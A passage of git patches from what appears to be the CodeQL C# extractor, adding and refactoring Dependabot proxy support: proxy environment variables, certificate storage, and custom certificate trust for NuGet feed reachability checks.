Make(IDotNetCliInvoker dotnetCliInvoker, ILogger logger) => new DotNet(dotnetCliInvoker, logger); diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs index 4295cce6716..b81b393e42a 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs @@ -12,12 +12,14 @@ namespace Semmle.Extraction.CSharp.DependencyFetching internal sealed class DotNetCliInvoker : IDotNetCliInvoker { private readonly ILogger logger; + private readonly DependabotProxy proxy; public string Exec { get; } - public DotNetCliInvoker(ILogger logger, string exec) + public DotNetCliInvoker(ILogger logger, string exec, TemporaryDirectory tempWorkingDirectory) { this.logger = logger; + this.proxy = new DependabotProxy(tempWorkingDirectory); this.Exec = exec; logger.LogInfo($"Using .NET CLI executable: '{Exec}'"); } @@ -38,6 +40,14 @@ namespace Semmle.Extraction.CSharp.DependencyFetching startInfo.EnvironmentVariables["DOTNET_CLI_UI_LANGUAGE"] = "en"; startInfo.EnvironmentVariables["MSBUILDDISABLENODEREUSE"] = "1"; startInfo.EnvironmentVariables["DOTNET_SKIP_FIRST_TIME_EXPERIENCE"] = "true"; + + // Configure the proxy settings, if applicable. + this.proxy.ApplyProxy(this.logger, startInfo); + + this.logger.LogInfo(startInfo.EnvironmentVariables["HTTP_PROXY"] ?? ""); + this.logger.LogInfo(startInfo.EnvironmentVariables["HTTPS_PROXY"] ?? ""); + this.logger.LogInfo(startInfo.EnvironmentVariables["SSL_CERT_FILE"] ?? ""); + return startInfo; } From 6cd5711313c9e47f39845b24051e6ecaee5df519 Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Tue, 19 Nov 2024 13:23:05 +0000 Subject: [PATCH 0820/1267] C#: Set environment variables for proxy for calls to `dotnet` --- .../DependabotProxy.cs | 14 ++++++++++++++ .../DotNetCliInvoker.cs | 4 ---- 2 files changed, 14 insertions(+), 4 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index 5b47189c745..96ba3452cef 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -1,6 +1,8 @@ using System; +using System.Diagnostics; using System.IO; using Semmle.Util; +using Semmle.Util.Logging; namespace Semmle.Extraction.CSharp.DependencyFetching { @@ -49,5 +51,17 @@ namespace Semmle.Extraction.CSharp.DependencyFetching using var writer = this.certFile.CreateText(); writer.Write(cert); } + + internal void ApplyProxy(ILogger logger, ProcessStartInfo startInfo) + { + // If the proxy isn't configured, we have nothing to do. + if (!this.IsConfigured) return; + + logger.LogInfo($"Setting up Dependabot proxy at {this.Address}"); + + startInfo.EnvironmentVariables["HTTP_PROXY"] = this.Address; + startInfo.EnvironmentVariables["HTTPS_PROXY"] = this.Address; + startInfo.EnvironmentVariables["SSL_CERT_FILE"] = this.certFile?.FullName; + } } } diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs index b81b393e42a..522d3e9ffd4 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs @@ -44,10 +44,6 @@ namespace Semmle.Extraction.CSharp.DependencyFetching // Configure the proxy settings, if applicable. this.proxy.ApplyProxy(this.logger, startInfo); - this.logger.LogInfo(startInfo.EnvironmentVariables["HTTP_PROXY"] ?? ""); - this.logger.LogInfo(startInfo.EnvironmentVariables["HTTPS_PROXY"] ?? ""); - this.logger.LogInfo(startInfo.EnvironmentVariables["SSL_CERT_FILE"] ?? ""); - return startInfo; } From de415d68cfa0428c2b133c5311014aced6a8807a Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Fri, 29 Nov 2024 13:18:58 +0000 Subject: [PATCH 0821/1267] C#: Add more logging to `DependabotProxy` --- .../DependabotProxy.cs | 10 ++++++++-- .../DotNetCliInvoker.cs | 2 +- 2 files changed, 9 insertions(+), 3 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index 96ba3452cef..c1db0b99017 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -22,7 +22,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching /// internal bool IsConfigured => !string.IsNullOrEmpty(this.Address); - internal DependabotProxy(TemporaryDirectory tempWorkingDirectory) + internal DependabotProxy(ILogger logger, TemporaryDirectory tempWorkingDirectory) { // Obtain and store the address of the Dependabot proxy, if available. this.host = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyHost); @@ -30,26 +30,32 @@ namespace Semmle.Extraction.CSharp.DependencyFetching if (string.IsNullOrWhiteSpace(host) || string.IsNullOrWhiteSpace(port)) { + logger.LogInfo("No Dependabot proxy credentials are configured."); return; } this.Address = $"http://{this.host}:{this.port}"; + logger.LogInfo($"Dependabot proxy configured at {this.Address}"); // Obtain and store the proxy's certificate, if available. var cert = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyCertificate); if (string.IsNullOrWhiteSpace(cert)) { + logger.LogInfo("No certificate configured for Dependabot proxy."); return; } var certDirPath = new DirectoryInfo(Path.Join(tempWorkingDirectory.DirInfo.FullName, ".dependabot-proxy")); Directory.CreateDirectory(certDirPath.FullName); - this.certFile = new FileInfo(Path.Join(certDirPath.FullName, "proxy.crt")); + var certFilePath = Path.Join(certDirPath.FullName, "proxy.crt"); + this.certFile = new FileInfo(certFilePath); using var writer = this.certFile.CreateText(); writer.Write(cert); + + logger.LogInfo($"Stored Dependabot proxy certificate at {certFilePath}"); } internal void ApplyProxy(ILogger logger, ProcessStartInfo startInfo) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs index 522d3e9ffd4..597acc58259 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs @@ -19,7 +19,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching public DotNetCliInvoker(ILogger logger, string exec, TemporaryDirectory tempWorkingDirectory) { this.logger = logger; - this.proxy = new DependabotProxy(tempWorkingDirectory); + this.proxy = new DependabotProxy(logger, tempWorkingDirectory); this.Exec = exec; logger.LogInfo($"Using .NET CLI executable: '{Exec}'"); } From 87bd21e12c311cf57965c33eb058add1aebf16ec Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Mon, 2 Dec 2024 13:40:37 +0000 Subject: [PATCH 0822/1267] C#: Use `Add` for environment variables --- .../DependabotProxy.cs | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index c1db0b99017..462cde58c87 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -65,9 +65,9 @@ namespace Semmle.Extraction.CSharp.DependencyFetching logger.LogInfo($"Setting up Dependabot proxy at {this.Address}"); - startInfo.EnvironmentVariables["HTTP_PROXY"] = this.Address; - startInfo.EnvironmentVariables["HTTPS_PROXY"] = this.Address; - startInfo.EnvironmentVariables["SSL_CERT_FILE"] = this.certFile?.FullName; + startInfo.EnvironmentVariables.Add("HTTP_PROXY", this.Address); + startInfo.EnvironmentVariables.Add("HTTPS_PROXY", this.Address); + startInfo.EnvironmentVariables.Add("SSL_CERT_FILE", this.certFile?.FullName); } } } From e999ec1ecf8736a5815522df5ffd97f8c6a1061b Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Mon, 2 Dec 2024 14:17:06 +0000 Subject: [PATCH 0823/1267] C# Expose `CertificatePath` from `DependabotProxy` --- .../DependabotProxy.cs | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index 462cde58c87..56bf08de9cc 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -16,6 +16,10 @@ namespace Semmle.Extraction.CSharp.DependencyFetching /// The full address of the Dependabot proxy, if available. /// internal readonly string? Address; + /// + /// The path to the temporary file where the certificate is stored. + /// + internal readonly string? CertificatePath; /// /// Gets a value indicating whether a Dependabot proxy is configured. @@ -49,13 +53,13 @@ namespace Semmle.Extraction.CSharp.DependencyFetching var certDirPath = new DirectoryInfo(Path.Join(tempWorkingDirectory.DirInfo.FullName, ".dependabot-proxy")); Directory.CreateDirectory(certDirPath.FullName); - var certFilePath = Path.Join(certDirPath.FullName, "proxy.crt"); - this.certFile = new FileInfo(certFilePath); + this.CertificatePath = Path.Join(certDirPath.FullName, "proxy.crt"); + this.certFile = new FileInfo(this.CertificatePath); using var writer = this.certFile.CreateText(); writer.Write(cert); - logger.LogInfo($"Stored Dependabot proxy certificate at {certFilePath}"); + logger.LogInfo($"Stored Dependabot proxy certificate at {this.CertificatePath}"); } internal void ApplyProxy(ILogger logger, ProcessStartInfo startInfo) From 984091d4a4cf8fa4e44fed4f22a9cc9f1fa1191d Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Mon, 2 Dec 2024 14:18:24 +0000 Subject: [PATCH 0824/1267] C#: Propagate `DependabotProxy` instance down from `DependencyManager` --- .../DependabotProxy.cs | 2 +- .../DependencyManager.cs | 7 +++++-- .../Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs | 4 ++-- .../DotNetCliInvoker.cs | 4 ++-- .../NugetPackageRestorer.cs | 3 +++ 5 files changed, 13 insertions(+), 7 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index 56bf08de9cc..207d19777cc 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -6,7 +6,7 @@ using Semmle.Util.Logging; namespace Semmle.Extraction.CSharp.DependencyFetching { - internal class DependabotProxy + public class DependabotProxy { private readonly string? host; private readonly string? port; diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs index 4866df1260e..de930867598 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs @@ -27,6 +27,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching private readonly ILogger logger; private readonly IDiagnosticsWriter diagnosticsWriter; private readonly NugetPackageRestorer nugetPackageRestorer; + private readonly DependabotProxy dependabotProxy; private readonly IDotNet dotnet; private readonly FileContent fileContent; private readonly FileProvider fileProvider; @@ -106,9 +107,11 @@ namespace Semmle.Extraction.CSharp.DependencyFetching return BuildScript.Success; }).Run(SystemBuildActions.Instance, startCallback, exitCallback); + dependabotProxy = new DependabotProxy(logger, tempWorkingDirectory); + try { - this.dotnet = DotNet.Make(logger, dotnetPath, tempWorkingDirectory); + this.dotnet = DotNet.Make(logger, dotnetPath, tempWorkingDirectory, dependabotProxy); runtimeLazy = new Lazy(() => new Runtime(dotnet)); } catch @@ -117,7 +120,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching throw; } - nugetPackageRestorer = new NugetPackageRestorer(fileProvider, fileContent, dotnet, diagnosticsWriter, logger, this); + nugetPackageRestorer = new NugetPackageRestorer(fileProvider, fileContent, dotnet, dependabotProxy, diagnosticsWriter, logger, this); var dllLocations = fileProvider.Dlls.Select(x => new AssemblyLookupLocation(x)).ToHashSet(); dllLocations.UnionWith(nugetPackageRestorer.Restore()); diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs index 439f00754dd..a82a0a47f41 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs @@ -27,11 +27,11 @@ namespace Semmle.Extraction.CSharp.DependencyFetching Info(); } - private DotNet(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory) : this(new DotNetCliInvoker(logger, Path.Combine(dotNetPath ?? string.Empty, "dotnet"), tempWorkingDirectory), logger, tempWorkingDirectory) { } + private DotNet(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory, DependabotProxy dependabotProxy) : this(new DotNetCliInvoker(logger, Path.Combine(dotNetPath ?? string.Empty, "dotnet"), dependabotProxy), logger, tempWorkingDirectory) { } internal static IDotNet Make(IDotNetCliInvoker dotnetCliInvoker, ILogger logger) => new DotNet(dotnetCliInvoker, logger); - public static IDotNet Make(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory) => new DotNet(logger, dotNetPath, tempWorkingDirectory); + public static IDotNet Make(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory, DependabotProxy dependabotProxy) => new DotNet(logger, dotNetPath, tempWorkingDirectory, dependabotProxy); private void Info() { diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs index 597acc58259..cdadfe1f5b8 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs @@ -16,10 +16,10 @@ namespace Semmle.Extraction.CSharp.DependencyFetching public string Exec { get; } - public DotNetCliInvoker(ILogger logger, string exec, TemporaryDirectory tempWorkingDirectory) + public DotNetCliInvoker(ILogger logger, string exec, DependabotProxy dependabotProxy) { this.logger = logger; - this.proxy = new DependabotProxy(logger, tempWorkingDirectory); + this.proxy = dependabotProxy; this.Exec = exec; logger.LogInfo($"Using .NET CLI executable: '{Exec}'"); } diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index f30760981f3..96ab9300bdf 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs @@ -20,6 +20,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching private readonly FileProvider fileProvider; private readonly FileContent fileContent; private readonly IDotNet dotnet; + private readonly DependabotProxy dependabotProxy; private readonly IDiagnosticsWriter diagnosticsWriter; private readonly TemporaryDirectory legacyPackageDirectory; private readonly TemporaryDirectory missingPackageDirectory; @@ -32,6 +33,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching FileProvider fileProvider, FileContent fileContent, IDotNet dotnet, + DependabotProxy dependabotProxy, IDiagnosticsWriter diagnosticsWriter, ILogger logger, ICompilationInfoContainer compilationInfoContainer) @@ -39,6 +41,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching this.fileProvider = fileProvider; this.fileContent = fileContent; this.dotnet = dotnet; + this.dependabotProxy = dependabotProxy; this.diagnosticsWriter = diagnosticsWriter; this.logger = logger; this.compilationInfoContainer = compilationInfoContainer; From ca251fb840ffdfcda228baa1dd90b7e678c02ee0 Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Mon, 2 Dec 2024 14:20:11 +0000 Subject: [PATCH 0825/1267] C#: Set up proxy for `IsFeedReachable`, if configured --- .../NugetPackageRestorer.cs | 23 ++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index 96ab9300bdf..dfa9349d426 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs @@ -3,7 +3,9 @@ using System.Collections.Concurrent; using System.Collections.Generic; using System.IO; using System.Linq; +using System.Net; using System.Net.Http; +using System.Security.Cryptography.X509Certificates; using System.Text; using System.Text.RegularExpressions; using System.Threading; @@ -591,7 +593,26 @@ namespace Semmle.Extraction.CSharp.DependencyFetching private bool IsFeedReachable(string feed, int timeoutMilliSeconds, int tryCount, bool allowExceptions = true) { logger.LogInfo($"Checking if Nuget feed '{feed}' is reachable..."); - using HttpClient client = new(); + + // Configure the HttpClient to be aware of the Dependabot Proxy, if used. + HttpClientHandler httpClientHandler = new(); + if (this.dependabotProxy.IsConfigured) + { + httpClientHandler.Proxy = new WebProxy(this.dependabotProxy.Address); + + if (!String.IsNullOrEmpty(this.dependabotProxy.CertificatePath)) + { + X509Certificate2 proxyCert = new X509Certificate2(this.dependabotProxy.CertificatePath); + httpClientHandler.ServerCertificateCustomValidationCallback = (message, cert, chain, _) => + { + chain.ChainPolicy.TrustMode = X509ChainTrustMode.CustomRootTrust; + chain.ChainPolicy.CustomTrustStore.Add(proxyCert); + return chain.Build(cert); + }; + } + } + + using HttpClient client = new(httpClientHandler); for (var i = 0; i < tryCount; i++) { From ee7f0b0f2afb157a3ae2f52410ecd66e19cd414f Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Tue, 3 Dec 2024 18:47:47 +0000 Subject: [PATCH 0826/1267] C#: Load Dependabot Proxy certificate in `DependabotProxy`, and implement `IDisposable` --- .../DependabotProxy.cs | 17 ++++++++++++++++- .../DependencyManager.cs | 1 + .../NugetPackageRestorer.cs | 5 ++--- 3 files changed, 19 insertions(+), 4 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index 207d19777cc..7d0f21d65b1 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -1,12 +1,13 @@ using System; using System.Diagnostics; using System.IO; +using System.Security.Cryptography.X509Certificates; using Semmle.Util; using Semmle.Util.Logging; namespace Semmle.Extraction.CSharp.DependencyFetching { - public class DependabotProxy + public class DependabotProxy : IDisposable { private readonly string? host; private readonly string? port; @@ -20,6 +21,10 @@ namespace Semmle.Extraction.CSharp.DependencyFetching /// The path to the temporary file where the certificate is stored. /// internal readonly string? CertificatePath; + /// + /// The certificate used for the Dependabot proxy. + /// + internal readonly X509Certificate2? Certificate; /// /// Gets a value indicating whether a Dependabot proxy is configured. @@ -60,6 +65,8 @@ namespace Semmle.Extraction.CSharp.DependencyFetching writer.Write(cert); logger.LogInfo($"Stored Dependabot proxy certificate at {this.CertificatePath}"); + + this.Certificate = new X509Certificate2(this.CertificatePath); } internal void ApplyProxy(ILogger logger, ProcessStartInfo startInfo) @@ -73,5 +80,13 @@ namespace Semmle.Extraction.CSharp.DependencyFetching startInfo.EnvironmentVariables.Add("HTTPS_PROXY", this.Address); startInfo.EnvironmentVariables.Add("SSL_CERT_FILE", this.certFile?.FullName); } + + public void Dispose() + { + if (this.Certificate != null) + { + this.Certificate.Dispose(); + } + } } } diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs index de930867598..bbd5ecbd127 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs @@ -545,6 +545,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching public void Dispose() { nugetPackageRestorer?.Dispose(); + dependabotProxy.Dispose(); if (cleanupTempWorkingDirectory) { tempWorkingDirectory?.Dispose(); diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index dfa9349d426..a01b3ae9649 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs @@ -600,13 +600,12 @@ namespace Semmle.Extraction.CSharp.DependencyFetching { httpClientHandler.Proxy = new WebProxy(this.dependabotProxy.Address); - if (!String.IsNullOrEmpty(this.dependabotProxy.CertificatePath)) + if (this.dependabotProxy.Certificate != null) { - X509Certificate2 proxyCert = new X509Certificate2(this.dependabotProxy.CertificatePath); httpClientHandler.ServerCertificateCustomValidationCallback = (message, cert, chain, _) => { chain.ChainPolicy.TrustMode = X509ChainTrustMode.CustomRootTrust; - chain.ChainPolicy.CustomTrustStore.Add(proxyCert); + chain.ChainPolicy.CustomTrustStore.Add(this.dependabotProxy.Certificate); return chain.Build(cert); }; } From 2e80e09f52e2e8c1d4b54507dfca05e4bfd9d94e Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Thu, 5 Dec 2024 12:13:29 +0000 Subject: [PATCH 0827/1267] C#: Apply suggestions from code review for `DependabotProxy` --- .../DependabotProxy.cs | 75 ++++++++----------- .../DependencyManager.cs | 4 +- .../DotNet.cs | 4 +- .../DotNetCliInvoker.cs | 13 +++- .../NugetPackageRestorer.cs | 6 +- 5 files changed, 48 insertions(+), 54 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index 7d0f21d65b1..d1a5df4dbc5 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -9,84 +9,71 @@ namespace Semmle.Extraction.CSharp.DependencyFetching { public class DependabotProxy : IDisposable { - private readonly string? host; - private readonly string? port; - private readonly FileInfo? certFile; + private readonly string host; + private readonly string port; /// /// The full address of the Dependabot proxy, if available. /// - internal readonly string? Address; + internal string Address { get; } /// /// The path to the temporary file where the certificate is stored. /// - internal readonly string? CertificatePath; + internal string? CertificatePath { get; private set; } /// /// The certificate used for the Dependabot proxy. /// - internal readonly X509Certificate2? Certificate; + internal X509Certificate2? Certificate { get; private set; } - /// - /// Gets a value indicating whether a Dependabot proxy is configured. - /// - internal bool IsConfigured => !string.IsNullOrEmpty(this.Address); - - internal DependabotProxy(ILogger logger, TemporaryDirectory tempWorkingDirectory) + internal static DependabotProxy? GetDependabotProxy(ILogger logger, TemporaryDirectory tempWorkingDirectory) { // Obtain and store the address of the Dependabot proxy, if available. - this.host = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyHost); - this.port = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyPort); + var host = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyHost); + var port = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyPort); if (string.IsNullOrWhiteSpace(host) || string.IsNullOrWhiteSpace(port)) { logger.LogInfo("No Dependabot proxy credentials are configured."); - return; + return null; } - this.Address = $"http://{this.host}:{this.port}"; - logger.LogInfo($"Dependabot proxy configured at {this.Address}"); + var result = new DependabotProxy(host, port); + logger.LogInfo($"Dependabot proxy configured at {result.Address}"); // Obtain and store the proxy's certificate, if available. var cert = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyCertificate); - if (string.IsNullOrWhiteSpace(cert)) + if (!string.IsNullOrWhiteSpace(cert)) { logger.LogInfo("No certificate configured for Dependabot proxy."); - return; + + var certDirPath = new DirectoryInfo(Path.Join(tempWorkingDirectory.DirInfo.FullName, ".dependabot-proxy")); + Directory.CreateDirectory(certDirPath.FullName); + + result.CertificatePath = Path.Join(certDirPath.FullName, "proxy.crt"); + var certFile = new FileInfo(result.CertificatePath); + + using var writer = certFile.CreateText(); + writer.Write(cert); + + logger.LogInfo($"Stored Dependabot proxy certificate at {result.CertificatePath}"); + + result.Certificate = new X509Certificate2(result.CertificatePath); } - var certDirPath = new DirectoryInfo(Path.Join(tempWorkingDirectory.DirInfo.FullName, ".dependabot-proxy")); - Directory.CreateDirectory(certDirPath.FullName); - - this.CertificatePath = Path.Join(certDirPath.FullName, "proxy.crt"); - this.certFile = new FileInfo(this.CertificatePath); - - using var writer = this.certFile.CreateText(); - writer.Write(cert); - - logger.LogInfo($"Stored Dependabot proxy certificate at {this.CertificatePath}"); - - this.Certificate = new X509Certificate2(this.CertificatePath); + return result; } - internal void ApplyProxy(ILogger logger, ProcessStartInfo startInfo) + private DependabotProxy(string host, string port) { - // If the proxy isn't configured, we have nothing to do. - if (!this.IsConfigured) return; - - logger.LogInfo($"Setting up Dependabot proxy at {this.Address}"); - - startInfo.EnvironmentVariables.Add("HTTP_PROXY", this.Address); - startInfo.EnvironmentVariables.Add("HTTPS_PROXY", this.Address); - startInfo.EnvironmentVariables.Add("SSL_CERT_FILE", this.certFile?.FullName); + this.host = host; + this.port = port; + this.Address = $"http://{this.host}:{this.port}"; } public void Dispose() { - if (this.Certificate != null) - { - this.Certificate.Dispose(); - } + this.Certificate?.Dispose(); } } } diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs index bbd5ecbd127..cf4c6d73bd6 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs @@ -27,7 +27,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching private readonly ILogger logger; private readonly IDiagnosticsWriter diagnosticsWriter; private readonly NugetPackageRestorer nugetPackageRestorer; - private readonly DependabotProxy dependabotProxy; + private readonly DependabotProxy? dependabotProxy; private readonly IDotNet dotnet; private readonly FileContent fileContent; private readonly FileProvider fileProvider; @@ -107,7 +107,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching return BuildScript.Success; }).Run(SystemBuildActions.Instance, startCallback, exitCallback); - dependabotProxy = new DependabotProxy(logger, tempWorkingDirectory); + dependabotProxy = DependabotProxy.GetDependabotProxy(logger, tempWorkingDirectory); try { diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs index a82a0a47f41..c1fdcc06e91 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs @@ -27,11 +27,11 @@ namespace Semmle.Extraction.CSharp.DependencyFetching Info(); } - private DotNet(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory, DependabotProxy dependabotProxy) : this(new DotNetCliInvoker(logger, Path.Combine(dotNetPath ?? string.Empty, "dotnet"), dependabotProxy), logger, tempWorkingDirectory) { } + private DotNet(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory, DependabotProxy? dependabotProxy) : this(new DotNetCliInvoker(logger, Path.Combine(dotNetPath ?? string.Empty, "dotnet"), dependabotProxy), logger, tempWorkingDirectory) { } internal static IDotNet Make(IDotNetCliInvoker dotnetCliInvoker, ILogger logger) => new DotNet(dotnetCliInvoker, logger); - public static IDotNet Make(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory, DependabotProxy dependabotProxy) => new DotNet(logger, dotNetPath, tempWorkingDirectory, dependabotProxy); + public static IDotNet Make(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory, DependabotProxy? dependabotProxy) => new DotNet(logger, dotNetPath, tempWorkingDirectory, dependabotProxy); private void Info() { diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs index cdadfe1f5b8..19f0f3dbe0d 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs @@ -12,11 